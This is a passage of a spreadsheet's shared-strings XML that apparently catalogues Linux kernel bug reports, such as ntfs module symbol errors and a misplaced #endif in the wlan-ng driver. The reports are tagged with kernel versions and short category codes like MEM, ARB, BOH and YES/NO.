    <t>Distribution: Gentoo Hardware Environment: Dell Inspiron 8600 Software Environment: Problem Description: Steps to reproduce: nhh221 ~ # sloccount /usr/src/linux-2.6.11-rc5 &gt; sloc.linux-2.6.11-rc5 tail: `-1' option is obsolete; use `-n 1' since this will be removed in the future ... Warning: file /usr/src/linux-2.6.11-rc5/arch/arm/mm/proc-arm1020.S line 449 has unmatched comment end Warning: file /usr/src/linux-2.6.11-rc5/arch/arm/mm/proc-arm1020e.S line 431 has unmatched comment end tail: `-1' option is obsolete; use `-n 1' since this will be removed in the future ...</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUMA-Q hangs during TSC initialization on boot.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>slab error in check_poison_obj(): cache `task_struct': object was modified after freeing</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Possible out of bounds error in ac97_patch.c from Stanford Checker</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>/lib/modules/2.5.47-ac3-rous1/kernel/fs/ntfs/ntfs.o: unresolved symbol page_states__per_cpu</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47-ac3 Distribution: Red Hat RawHide Problem Description: unresolved symbol page_states__per_cpu in ntfs module Steps to reproduce: [root@rousalka nim]# /sbin/modprobe ntfs /lib/modules/2.5.47-ac3-rous1/kernel/fs/ntfs/ntfs.o: unresolved symbol page_states__per_cpu /lib/modules/2.5.47-ac3-rous1/kernel/fs/ntfs/ntfs.o: insmod /lib/modules/2.5.47-ac3-rous1/kernel/fs/ntfs/ntfs.o failed /lib/modules/2.5.47-ac3-rous1/kernel/fs/ntfs/ntfs.o: insmod ntfs failed</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.11</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.17</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.24</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.22</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.25</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.27</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.26</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.26</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.26</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.27</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.28</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.33</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.34</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.22</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.17</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.25</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.11</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.11</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.11</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.11</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.12</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.12</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.13</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.13</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.14</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.15</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.17</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.18</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.19</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.20</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.21</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.23</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.24</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.25</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.26</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.27</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.28</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.29</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.30</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.27</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.31</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.31</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.30</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.33</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.33</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.34</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.35</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.36</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.37</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.38</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.39</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.23</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.15</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.28</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.24</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.26</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.30</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.36</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.27</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.24</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.26</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.29</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.30</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>In file: drivers/staging/wlan-ng/p80211netdev.c There is this switch-case code: switch (ethcmd) { case ETHTOOL_GDRVINFO: info.cmd = ethcmd; snprintf(info.driver, sizeof(info.driver), "p80211_%s", wlandev-&gt;nsdname); snprintf(info.version, sizeof(info.version), "%s", WLAN_RELEASE); if (copy_to_user(useraddr, &amp;info, sizeof(info))) return -EFAULT; return 0; #ifdef ETHTOOL_GLINK case ETHTOOL_GLINK: edata.cmd = ethcmd; if (wlandev-&gt;linkstatus &amp;&amp; (wlandev-&gt;macmode != WLAN_MACMODE_NONE)) { edata.data = 1; } else { edata.data = 0; } if (copy_to_user(useraddr, &amp;edata, sizeof(edata))) return -EFAULT; return 0; } #endif If ETHTOOL_GLINK is not defined, the end for switch case is not to be found. This can probably be fixed by moving the #endif above the closing }. #ifdef ETHTOOL_GLINK case ETHTOOL_GLINK: edata.cmd = ethcmd; if (wlandev-&gt;linkstatus &amp;&amp; (wlandev-&gt;macmode != WLAN_MACMODE_NONE)) { edata.data = 1; } else { edata.data = 0; } if (copy_to_user(useraddr, &amp;edata, sizeof(edata))) return -EFAULT; return 0; #endif } This bug was found using Cppcheck and it also prevents Cppcheck from checking the file (the error was a bit misleading about the location of the problem): [../kernel/linux-2.6/drivers/staging/wlan-ng/p80211types.h:207]: (error) Invalid number of character ({). Can't process file.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PATCH FOUND</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
  </si>
  <si>
    <t>ENV</t>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
  </si>
  <si>
    <t>LAG</t>
  </si>
  <si>
    <t>SEQ</t>
  </si>
  <si>
    <t>NAU</t>
  </si>
  <si>
    <t>On big-endian machines getsockopt returns 0 (via optval) for optlen==1 when returned value should be 255</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>[8139cp?] 2.6.0-test6 hangs while executing "make menuconfig" on a remote computer</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pcnet32 on fibre fails to get link after unplug/plug</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>(net de2104x) Kernel panic with de2104x tulip driver on boot</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>(net tlan) receives interrupt for uncompleted RX frame during heavy network load or after a random period of time.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>(net axnet_cs) PCMCIA network interface (axnet_cs driver) stops working on fast incomming data</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>tulip crash at modprobe with ULi M5263 integrated controller (PCI ID 5263)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Network don't work with SiS 900 PCI Fast Ethernet. Mainly, I tried with DHCP interface. With exacly the same configurations network works on olders kernels and don't work on the newest</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
  </si>
  <si>
    <t>STO</t>
  </si>
  <si>
    <t>UNK</t>
  </si>
  <si>
    <t>Problem mounting ext2 using ext3 (or any failure to mount a partition) leads to an oops.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>linux 2.6.15.3 networking bug in r8169 device driver while having mac changed</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOG</t>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SEQ</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Specifying DMA channel for parport causes oops in dma_alloc_coherent</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>generate-modules.conf does not produce /etc/modprobe.conf after using ./genrate-modules.conf -q /etc/modprobe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Some cleanup needed in mach-summit/mach_apic.h, confusion between apicmask and cpumask</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Timing related bug in the RPC client code</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ReiserFS loopback filesystem seems to freeze with heavy FS activity</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Very HIGH File &amp; VM system latencies and system stop responding while extracting big tar  archive file.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
